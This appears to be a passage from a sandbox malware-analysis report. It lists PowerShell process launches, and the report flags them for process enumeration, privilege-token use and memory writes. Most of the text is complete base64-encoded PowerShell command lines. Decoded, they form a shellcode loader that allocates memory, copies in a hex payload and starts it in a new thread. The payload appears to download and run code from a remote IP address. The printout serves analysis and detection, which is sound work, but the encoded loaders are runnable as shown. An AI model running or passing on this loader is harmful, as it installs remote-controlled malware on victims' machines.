H0AMwA3ACwAfQAzADMALAB9ADIAZQAsAH0AMwAxACwAfQAzADQALAB9ADMAMwAsAH0AMAAwACwAfQBiAGIALAB9AGYAMAAsAH0AYgA1ACwAfQBhADIALAB9ADUANgAsAH0ANgBhACwAfQAwADAALAB9ADUAMwAsAH0AZgBmACwAfQBkADUAIgA7ACQAdgBOAD0AQQBkAGQALQBUAHkAcABlACAALQBwAGEAcwBzACAALQBtACAAJABMAEsAIAAtAE4AYQBtAGUAIAAiAFAARAAiACAALQBuAGEAbQBlAHMAIABzAGcATQA7ACQAdgBOAD0AJAB2AE4ALgByAGUAcABsAGEAYwBlACgAIgBzAGcATQAiACwAIAAiAFcAaQBuADMAMgBGAHUAIgArACIAbgAiACsAIgBjAHQAaQBvAG4AcwAiACkAOwBbAGIAeQB0AGUAWwBdAF0AJABzAGMAIAA9ACAAJABzAGMALgByAGUAcABsAGEAYwBlACgAIgB9ACIALAAiAHEAdwB3AHgAIgApAC4AcgBlAHAAbABhAGMAZQAoACIAcQB3AHcAIgAsACAAIgAwACIAKQAuAFMAcABsAGkAdAAoACIALAAiACkAOwAkAE8ASQA9ADAAeAAxADAAMAAxADsAaQBmACAAKAAkAHMAYwAuAEwAIAAtAGcAdAAgADAAeAAxADAAMAAx'+'ACkAewAkAE8ASQA9ACQAcwBjAC4ATAB9ADsAJABHAEgAPQAkAHYATgA6ADoAYwBhAGwAbABvAGMAKAAwAHgAMQAwADAAMQAsACAAMQApADsAWwBVAEkAbgB0ADYANABdACQAaQBHAGEAIAA9ACAAMAA7AGYAbwByACgAJABJAGoAPQAwADsAJABJAGoAIAAtAGwAZQAoACQAcwBjAC4ATABlAG4AZwB0AGgALQAxACkAOwAkAEkAagArACsAKQB7ACQAdgBOADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQARwBIAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAEkAagApACwAIAAkAHMAYwBbACQASQBqAF0ALAAgADEAKQB9ADsAJAB2AE4AOgA6AFYAaQByAHQAdQBhAGwAUAByAG8AdABlAGMAdAAoACQARwBIACwAIAAwAHgAMQAwADAAMQAsACAAMAB4ADQAMAAsACAAWwBSAGUAZgBdACQAaQBHAGEAKQA7ACQATwBwAGwAPQBbAGkAbgB0AF0AMAB4ADAAMAA7ACQAdgBOADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAFsAaQBuAHQAXQAwACwAJABPAHAAbAAsACQARwBIACwAMAAsADAALAAwACkAOwAnADsAJABLAGYAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAE4AaQApACkAOwAkAFEARwA9ACIAcABvAHcAZQByAHMAaABlAGwAbAAiADsAJABLAFgAPQAiAFcAaQBuAGQAbwB3AHMAIgA7ACQATwB3AFYAIAA9ACAAIgBDADoAXAAkAEsAWABcAE0AVwBEAHQAVQBCAEgAdgBcACQASwBYACQAUQBHAFwAdgAxAC4AMABcACQAUQBHACIAOwAkAE8AdwBWACAAPQAgACQATwB3AFYALgByAGUAcABsAGEAYwBlACgAIgBNAFcARAB0ACIALAAgACIAcwB5AHMAIgApADsAJABPAHcAVgAgAD0AIAAkAE8AdwBWAC4AcgBlAHAAbABhAGMAZQAoACIAVQBCAEgAdgAiACwAIAAiAHcAbwB3ADYANAAiACkAOwAkAHYAeABUACAAPQAgACcAVAByAHUAIgArACIAZQAiACsAIgAnADsAaQBmACgAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoASQBzADYANABCAGkAdABPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQAgAC0AZQBxACAAJwAkAHYAeABUACcAKQB7ACQAUQBHAD0AIAAkAE8AdwBWAH0AOwAkAEwAcQA9ACIAIAAkAFEARwAgAG8ATABIAEkAIAAkAEsAZgAiADsAJABMAHEAPQAkAEwAcQAuAHIAZQBwAGwAYQBjAGUAKAAiAG8ATABIAEkAIgAsACAAIgAtAG4AbwBlAHgAaQB0ACAALQBlACIAKQA7AGkAZQB4ACAAJABMAHEA')"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1364

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABOAGkAPQAnACQATABLAD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByACIAKwAiAHQAIgArACIALgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAIgArACIAbgAiACsAIgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByACIAKwAiAG4AIgArACIAZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABpAEcAYQApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByACIAKwAiAHQAIgArACIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAcwBjAD0AIgB9AGUAOAAsAH0AOAAyACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA2ADAALAB9ADgAOQAsAH0AZQA1ACwAfQAzADEALAB9AGMAMAAsAH0ANgA0ACwAfQA4AGIALAB9ADUAMAAsAH0AMwAwACwAfQA4AGIALAB9ADUAMgAsAH0AMABjACwAfQA4AGIALAB9ADUAMgAsAH0AMQA0ACwAfQA4AGIALAB9ADcAMgAsAH0AMgA4ACwAfQAwAGYALAB9AGIANwAsAH0ANABhACwAfQAyADYALAB9ADMAMQAsAH0AZgBmACwAfQBhAGMALAB9ADMAYwAsAH0ANgAxACwAfQA3AGMALAB9ADAAMgAsAH0AMgBjACwAfQAyADAALAB9AGMAMQAsAH0AYwBmACwAfQAwAGQALAB9ADAAMQAsAH0AYwA3ACwAfQBlADIALAB9AGYAMgAsAH0ANQAyACwAfQA1ADcALAB9ADgAYgAsAH0ANQAyACwAfQAxADAALAB9ADgAYgAsAH0ANABhACwAfQAzAGMALAB9ADgAYgAsAH0ANABjACwAfQAxADEALAB9ADcAOAAsAH0AZQAzACwAfQA0ADgALAB9ADAAMQAsAH0AZAAxACwAfQA1ADEALAB9ADgAYgAsAH0ANQA5ACwAfQAyADAALAB9ADAAMQAsAH0AZAAzACwAfQA4AGIALAB9ADQAOQAsAH0AMQA4ACwAfQBlADMALAB9ADMAYQAsAH0ANAA5ACwAfQA4AGIALAB9ADMANAAsAH0AOABiACwAfQAwADEALAB9AGQANgAsAH0AMwAxACwAfQBmAGYALAB9AGEAYwAsAH0AYwAxACwAfQBjAGYALAB9ADAAZAAsAH0AMAAxACwAfQBjADcALAB9ADMAOAAsAH0AZQAwACwAfQA3ADUALAB9AGYANgAsAH0AMAAzACwAfQA3AGQALAB9AGYAOAAsAH0AMwBiACwAfQA3AGQALAB9ADIANAAsAH0ANwA1ACwAfQBlADQALAB9ADUAOAAsAH0AOABiACwAfQA1ADgALAB9ADIANAAsAH0AMAAxACwAfQBkADMALAB9ADYANgAsAH0AOABiACwAfQAwAGMALAB9ADQAYgAsAH0AOABiACwAfQA1ADgALAB9ADEAYwAsAH0AMAAxACwAfQBkADMALAB9ADgAYgAsAH0AMAA0ACwAfQA4AGIALAB9ADAAMQAsAH0AZAAwACwAfQA4ADkALAB9ADQANAAsAH0AMgA0ACwAfQAyADQALAB9ADUAYgAsAH0ANQBiACwAfQA2ADEALAB9ADUAOQAsAH0ANQBhACwAfQA1ADEALAB9AGYAZgAsAH0AZQAwACwAfQA1AGYALAB9ADUAZgAsAH0ANQBhACwAfQA4AGIALAB9ADEAMgAsAH0AZQBiACwAfQA4AGQALAB9ADUAZAAsAH0ANgA4ACwAfQA2AGUALAB9ADYANQAsAH0ANwA0ACwAfQAwADAALAB9ADYAOAAsAH0ANwA3ACwAfQA2ADkALAB9ADYAZQAsAH0ANgA5ACwAfQA1ADQALAB9ADYAOAAsAH0ANABjACwAfQA3ADcALAB9ADIANgAsAH0AMAA3ACwAfQBmAGYALAB9AGQANQAsAH0AMwAxACwAfQBkAGIALAB9ADUAMwAsAH0ANQAzACwAfQA1ADMALAB9ADUAMwAsAH0ANQAzACwAfQBlADgALAB9ADMAZQAsAH0AMAAwACwAfQAwADAALAB9ADAAMAAsAH0ANABkACwAfQA2AGYALAB9ADcAYQAsAH0ANgA5ACwAfQA2AGMALAB9ADYAYwAsAH0ANgAxACwAfQAyAGYALAB9ADMANQAsAH0AMgBlACwAfQAzADAALAB9ADIAMAAsAH0AMgA4ACwAfQA1ADcALAB9ADYAOQAsAH0ANgBlACwAfQA2ADQALAB9ADYAZgAsAH0ANwA3ACwAfQA3ADMALAB9ADIAMAAsAH0ANABlACwAfQA1ADQALAB9ADIAMAAsAH0AMwA2ACwAfQAyAGUALAB9ADMAMQAsAH0AMwBiACwAfQAyADAALAB9ADUANAAsAH0ANwAyACwAfQA2ADkALAB9ADYANAAsAH0ANgA1ACwAfQA2AGUALAB9ADcANAAsAH0AMgBmACwAfQAzADcALAB9ADIAZQAsAH0AMwAwACwAfQAzAGIALAB9ADIAMAAsAH0ANwAyACwAfQA3ADYALAB9ADMAYQAsAH0AMwAxACwAfQAzADEALAB9ADIAZQAsAH0AMwAwACwAfQAyADkALAB9ADIAMAAsAH0ANgBjACwAfQA2ADkALAB9ADYAYgAsAH0ANgA1ACwAfQAyADAALAB9ADQANwAsAH0ANgA1ACwAfQA2ADMALAB9ADYAYgAsAH0ANgBmACwAfQAwADAALAB9ADYAOAAsAH0AMwBhACwAfQA1ADYALAB9ADcAOQAsAH0AYQA3ACwAfQBmAGYALAB9AGQANQAsAH0ANQAzACwAfQA1ADMALAB9ADYAYQAsAH0AMAAzACwAfQA1ADMALAB9ADUAMwAsAH0ANgA4ACwAfQBiAGIALAB9ADAAMQAsAH0AMAAwACwAfQAwADAALAB9AGUAOAAsAH0ANQAxACwAfQAwADEALAB9ADAAMAAsAH0AMAAwACwAfQAyAGYALAB9ADYAMgAsAH0ANgA3ACwAfQA1AGEALAB9ADUAMAAsAH0AMwAzACwAfQA1ADgALAB9ADMANQAsAH0ANQA1ACwAfQA0AGYALAB9ADYAZQAsAH0ANwA5ACwAfQA1ADAALAB9ADcAOQAsAH0AMwA0ACwAfQAzADcALAB9ADQAYgAsAH0AMwAwACwAfQA1ADQALAB9ADQAZAAsAH0ANQBhACwAfQA0AGMALAB9ADYANwAsAH0ANwAxACwAfQA0ADgALAB9ADYAMQAsAH0ANwAyACwAfQA3ADcALAB9ADMAMgAsAH0ANAA4ACwAfQA1ADYALAB9ADMAMQAsAH0ANABkACwAfQA2ADkALAB9ADMAOAAsAH0ANwA4ACwAfQAzADMALAB9ADUANwAsAH0ANAA4ACwAfQA1ADgALAB9ADcANgAsAH0ANwA1ACwAfQA2AGUALAB9ADUAMwAsAH0ANQA0ACwAfQA0ADcALAB9ADYAZAAsAH0ANQA4ACwAfQA2ADUALAB9ADUAZgAsAH0ANABlACwAfQA1ADQALAB9ADQAZAAsAH0ANQAwACwAfQA2ADIALAB9ADMANgAsAH0AMgBkACwAfQA0ADQALAB9ADYAZQAsAH0ANwBhACwAfQA3ADcALAB9ADUANAAsAH0ANAA2ACwAfQA2ADQALAB9ADUANQAsAH0ANgA3ACwAfQA1ADMALAB9ADQAMgAsAH0ANgBlACwAfQAzADIALAB9ADUANQAsAH0ANAA2ACwAfQA2AGEALAB9ADYAMQAsAH0ANgA1ACwAfQA3ADQALAB9ADMAMQAsAH0AMwAzACwAfQA3ADYALAB9ADQAYwAsAH0ANQAyACwAfQA0ADUALAB9ADcAMQAsAH0ANwAwACwAfQA1AGYALAB9ADUAMAAsAH0ANwA2ACwAfQA0ADgALAB9ADUAMwAsAH0AMwAzACwAfQA3AGEALAB9ADYAZQAsAH0ANAA1ACwAfQA3ADEALAB9ADYAMQAsAH0ANQBhACwAfQA0AGYALAB9ADYAOAAsAH0AMwAyACwAfQA0ADIALAB9ADQAMQAsAH0ANQAyACwAfQA3ADIALAB9ADcAMQAsAH0ANgA1ACwAfQAzADIALAB9ADcANAAsAH0ANQAzACwAfQA2ADUALAB9ADUAMgAsAH0AMwAwACwAfQAyAGQALAB9ADQANQAsAH0ANQA5ACwAfQA3ADEALAB9ADUANQAsAH0ANQA0ACwAfQA3ADEALAB9ADUANwAsAH0ANgA3ACwAfQA0ADgALAB9ADQANgAsAH0ANgAzACwAfQA1ADAALAB9ADcANQAsAH0ANAA0ACwAfQA0AGQALAB9ADQAZgAsAH0AMwAzACwAfQA0ADUALAB9ADYANAAsAH0ANABlACwAfQA0AGMALAB9ADIAZAAsAH0ANgAzACwAfQAzADUALAB9ADQANQAsAH0ANwA5ACwAfQAzADUALAB9ADcAOQAsAH0ANQAyACwAfQA1ADMALAB9ADMANAAsAH0ANgBjACwAfQA0ADgALAB9ADQAMwAsAH0ANwBhACwAfQA3ADMALAB9ADMAOQAsAH0ANQBhACwAfQA1ADgALAB9ADcAOQAsAH0ANAA5ACwAfQA3ADQALAB9ADQAYQAsAH0ANgA2ACwAfQA1ADkALAB9ADUANwAsAH0ANABkACwAfQA1ADYALAB9ADQAZQAsAH0ANQA0ACwAfQA3ADYALAB9ADYAMgAsAH0AMwA1ACwAfQAzADEALAB9ADYANwAsAH0ANgBhACwAfQA2ADkALAB9ADcANgAsAH0ANgA3ACwAfQA2ADIALAB9ADQANwAsAH0ANgA4ACwAfQA2AGEALAB9ADIAZAAsAH0ANAA1ACwAfQA3ADcALAB9ADMAOAAsAH0ANgA3ACwAfQA2AGMALAB9ADcANAAsAH0ANgBiACwAfQA3ADMALAB9ADQAZgAsAH0ANQA2ACwAfQA2AGMALAB9ADYAYQAsAH0ANABiACwAfQA2ADgALAB9ADcANAAsAH0AMwA3ACwAfQA3ADUALAB9ADAAMAAsAH0ANQAwACwAfQA2ADgALAB9ADUANwAsAH0AOAA5ACwAfQA5AGYALAB9AGMANgAsAH0AZgBmACwAfQBkADUALAB9ADgAOQAsAH0AYwA2ACwAfQA1ADMALAB9ADYAOAAsAH0AMAAwACwAfQAzADIALAB9AGUAMAAsAH0AOAA0ACwAfQA1ADMALAB9ADUAMwAsAH0ANQAzACwAfQA1ADcALAB9ADUAMwAsAH0ANQA2ACwAfQA2ADgALAB9AGUAYgAsAH0ANQA1ACwAfQAyAGUALAB9ADMAYgAsAH0AZgBmACwAfQBkADUALAB9ADkANgAsAH0ANgBhACwAfQAwAGEALAB9ADUAZgAsAH0ANgA4ACwAfQA4ADAALAB9ADMAMwAsAH0AMAAwACwAfQAwADAALAB9ADgAOQAsAH0AZQAwACwAfQA2AGEALAB9ADAANAAsAH0ANQAwACwAfQA2AGEALAB9ADEAZgAsAH0ANQA2ACwAfQA2ADgALAB9ADcANQAsAH0ANAA2ACwAfQA5AGUALAB9ADgANgAsAH0AZgBmACwAfQBkADUALAB9ADUAMwAsAH0ANQAzACwAfQA1ADMALAB9ADUAMwAsAH0ANQA2ACwAfQA2ADgALAB9ADIAZAAsAH0AMAA2ACwAfQAxADgALAB9ADcAYgAsAH0AZgBmACwAfQBkADUALAB9ADgANQAsAH0AYwAwACwAfQA3ADUALAB9ADEANAAsAH0ANgA4ACwAfQA4ADgALAB9ADEAMwAsAH0AMAAwACwAfQAwADAALAB9ADYAOAAsAH0ANAA0ACwAfQBmADAALAB9ADMANQAsAH0AZQAwACwAfQBmAGYALAB9AGQANQAsAH0ANABmACwAfQA3ADUALAB9AGMAZAAsAH0AZQA4ACwAfQA0AGEALAB9ADAAMAAsAH0AMAAwACwAfQAwADAALAB9ADYAYQAsAH0ANAAwACwAfQA2ADgALAB9ADAAMAAsAH0AMQAwACwAfQAwADAALAB9ADAAMAAsAH0ANgA4ACwAfQAwADAALAB9ADAAMAAsAH0ANAAwACwAfQAwADAALAB9ADUAMwAsAH0ANgA4ACwAfQA1ADgALAB9AGEANAAsAH0ANQAzACwAfQBlADUALAB9AGYAZgAsAH0AZAA1ACwAfQA5ADMALAB9ADUAMwAsAH0ANQAzACwAfQA4ADkALAB9AGUANwAsAH0ANQA3ACwAfQA2ADgALAB9ADAAMAAsAH0AMgAwACwAfQAwADAALAB9ADAAMAAsAH0ANQAzACwAfQA1ADYALAB9ADYAOAAsAH0AMQAyACwAfQA5ADYALAB9ADgAOQAsAH0AZQAyACwAfQBmAGYALAB9AGQANQAsAH0AOAA1ACwAfQBjADAALAB9ADcANAAsAH0AYwBmACwAfQA4AGIALAB9ADAANwAsAH0AMAAxACwAfQBjADMALAB9ADgANQAsAH0AYwAwACwAfQA3ADUALAB9AGUANQAsAH0ANQA4ACwAfQBjADMALAB9ADUAZgAsAH0AZQA4ACwAfQA2AGIALAB9AGYAZgAsAH0AZgBmACwAfQBmAGYALAB9ADMAMQAsAH0AMwA2ACwAfQAzADcALAB9ADIAZQAsAH0AMwA5ACwAfQAzADkALAB9ADIAZQAsAH0AMwA3ACwAfQAzADMALAB9ADIAZQAsAH0AMwAxACwAfQAzADQALAB9ADMAMwAsAH0AMAAwACwAfQBiAGIALAB9AGYAMAAsAH0AYgA1ACwAfQBhADIALAB9ADUANgAsAH0ANgBhACwAfQAwADAALAB9ADUAMwAsAH0AZgBmACwAfQBkADUAIgA7ACQAdgBOAD0AQQBkAGQALQBUAHkAcABlACAALQBwAGEAcwBzACAALQBtACAAJABMAEsAIAAtAE4AYQBtAGUAIAAiAFAARAAiACAALQBuAGEAbQBlAHMAIABzAGcATQA7ACQAdgBOAD0AJAB2AE4ALgByAGUAcABsAGEAYwBlACgAIgBzAGcATQAiACwAIAAiAFcAaQBuADMAMgBGAHUAIgArACIAbgAiACsAIgBjAHQAaQBvAG4AcwAiACkAOwBbAGIAeQB0AGUAWwBdAF0AJABzAGMAIAA9ACAAJABzAGMALgByAGUAcABsAGEAYwBlACgAIgB9ACIALAAiAHEAdwB3AHgAIgApAC4AcgBlAHAAbABhAGMAZQAoACIAcQB3AHcAIgAsACAAIgAwACIAKQAuAFMAcABsAGkAdAAoACIALAAiACkAOwAkAE8ASQA9ADAAeAAxADAAMAAxADsAaQBmACAAKAAkAHMAYwAuAEwAIAAtAGcAdAAgADAAeAAxADAAMAAxACkAewAkAE8ASQA9ACQAcwBjAC4ATAB9ADsAJABHAEgAPQAkAHYATgA6ADoAYwBhAGwAbABvAGMAKAAwAHgAMQAwADAAMQAsACAAMQApADsAWwBVAEkAbgB0ADYANABdACQAaQBHAGEAIAA9ACAAMAA7AGYAbwByACgAJABJAGoAPQAwADsAJABJAGoAIAAtAGwAZQAoACQAcwBjAC4ATABlAG4AZwB0AGgALQAxACkAOwAkAEkAagArACsAKQB7ACQAdgBOADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQARwBIAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAEkAagApACwAIAAkAHMAYwBbACQASQBqAF0ALAAgADEAKQB9ADsAJAB2AE4AOgA6AFYAaQByAHQAdQBhAGwAUAByAG8AdABlAGMAdAAoACQARwBIACwAIAAwAHgAMQAwADAAMQAsACAAMAB4ADQAMAAsACAAWwBSAGUAZgBdACQAaQBHAGEAKQA7ACQATwBwAGwAPQBbAGkAbgB0AF0AMAB4ADAAMAA7ACQAdgBOADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAFsAaQBuAHQAXQAwACwAJABPAHAAbAAsACQARwBIACwAMAAsADAALAAwACkAOwAnADsAJABLAGYAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAE4AaQApACkAOwAkAFEARwA9ACIAcABvAHcAZQByAHMAaABlAGwAbAAiADsAJABLAFgAPQAiAFcAaQBuAGQAbwB3AHMAIgA7ACQATwB3AFYAIAA9ACAAIgBDADoAXAAkAEsAWABcAE0AVwBEAHQAVQBCAEgAdgBcACQASwBYACQAUQBHAFwAdgAxAC4AMABcACQAUQBHACIAOwAkAE8AdwBWACAAPQAgACQATwB3AFYALgByAGUAcABsAGEAYwBlACgAIgBNAFcARAB0ACIALAAgACIAcwB5AHMAIgApADsAJABPAHcAVgAgAD0AIAAkAE8AdwBWAC4AcgBlAHAAbABhAGMAZQAoACIAVQBCAEgAdgAiACwAIAAiAHcAbwB3ADYANAAiACkAOwAkAHYAeABUACAAPQAgACcAVAByAHUAIgArACIAZQAiACsAIgAnADsAaQBmACgAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoASQBzADYANABCAGkAdABPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQAgAC0AZQBxACAAJwAkAHYAeABUACcAKQB7ACQAUQBHAD0AIAAkAE8AdwBWAH0AOwAkAEwAcQA9ACIAIAAkAFEARwAgAG8ATABIAEkAIAAkAEsAZgAiADsAJABMAHEAPQAkAEwAcQAuAHIAZQBwAGwAYQBjAGUAKAAiAG8ATABIAEkAIgAsACAAIgAtAG4AbwBlAHgAaQB0ACAALQBlACIAKQA7AGkAZQB4ACAAJABMAHEA
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1564

C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exe
"C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exe" -noexit -e JABMAEsAPQAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByACIAKwAiAHQAIgArACIALgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAIgArACIAbgAiACsAIgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByACIAKwAiAG4AIgArACIAZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABpAEcAYQApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByACIAKwAiAHQAIgArACIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAOwAkAHMAYwA9ACIAfQBlADgALAB9ADgAMgAsAH0AMAAwACwAfQAwADAALAB9ADAAMAAsAH0ANgAwACwAfQA4ADkALAB9AGUANQAsAH0AMwAxACwAfQBjADAALAB9ADYANAAsAH0AOABiACwAfQA1ADAALAB9ADMAMAAsAH0AOABiACwAfQA1ADIALAB9ADAAYwAsAH0AOABiACwAfQA1ADIALAB9ADEANAAsAH0AOABiACwAfQA3ADIALAB9ADIAOAAsAH0AMABmACwAfQBiADcALAB9ADQAYQAsAH0AMgA2ACwAfQAzADEALAB9AGYAZgAsAH0AYQBjACwAfQAzAGMALAB9ADYAMQAsAH0ANwBjACwAfQAwADIALAB9ADIAYwAsAH0AMgAwACwAfQBjADEALAB9AGMAZgAsAH0AMABkACwAfQAwADEALAB9AGMANwAsAH0AZQAyACwAfQBmADIALAB9ADUAMgAsAH0ANQA3ACwAfQA4AGIALAB9ADUAMgAsAH0AMQAwACwAfQA4AGIALAB9ADQAYQAsAH0AMwBjACwAfQA4AGIALAB9ADQAYwAsAH0AMQAxACwAfQA3ADgALAB9AGUAMwAsAH0ANAA4ACwAfQAwADEALAB9AGQAMQAsAH0ANQAxACwAfQA4AGIALAB9ADUAOQAsAH0AMgAwACwAfQAwADEALAB9AGQAMwAsAH0AOABiACwAfQA0ADkALAB9ADEAOAAsAH0AZQAzACwAfQAzAGEALAB9ADQAOQAsAH0AOABiACwAfQAzADQALAB9ADgAYgAsAH0AMAAxACwAfQBkADYALAB9ADMAMQAsAH0AZgBmACwAfQBhAGMALAB9AGMAMQAsAH0AYwBmACwAfQAwAGQALAB9ADAAMQAsAH0AYwA3ACwAfQAzADgALAB9AGUAMAAsAH0ANwA1ACwAfQBmADYALAB9ADAAMwAsAH0ANwBkACwAfQBmADgALAB9ADMAYgAsAH0ANwBkACwAfQAyADQALAB9ADcANQAsAH0AZQA0ACwAfQA1ADgALAB9ADgAYgAsAH0ANQA4ACwAfQAyADQALAB9ADAAMQAsAH0AZAAzACwAfQA2ADYALAB9ADgAYgAsAH0AMABjACwAfQA0AGIALAB9ADgAYgAsAH0ANQA4ACwAfQAxAGMALAB9ADAAMQAsAH0AZAAzACwAfQA4AGIALAB9ADAANAAsAH0AOABiACwAfQAwADEALAB9AGQAMAAsAH0AOAA5ACwAfQA0ADQALAB9ADIANAAsAH0AMgA0ACwAfQA1AGIALAB9ADUAYgAsAH0ANgAxACwAfQA1ADkALAB9ADUAYQAsAH0ANQAxACwAfQBmAGYALAB9AGUAMAAsAH0ANQBmACwAfQA1AGYALAB9ADUAYQAsAH0AOABiACwAfQAxADIALAB9AGUAYgAsAH0AOABkACwAfQA1AGQALAB9ADYAOAAsAH0ANgBlACwAfQA2ADUALAB9ADcANAAsAH0AMAAwACwAfQA2ADgALAB9ADcANwAsAH0ANgA5ACwAfQA2AGUALAB9ADYAOQAsAH0ANQA0ACwAfQA2ADgALAB9ADQAYwAsAH0ANwA3ACwAfQAyADYALAB9ADAANwAsAH0AZgBmACwAfQBkADUALAB9ADMAMQAsAH0AZABiACwAfQA1ADMALAB9ADUAMwAsAH0ANQAzACwAfQA1ADMALAB9ADUAMwAsAH0AZQA4ACwAfQAzAGUALAB9ADAAMAAsAH0AMAAwACwAfQAwADAALAB9ADQAZAAsAH0AN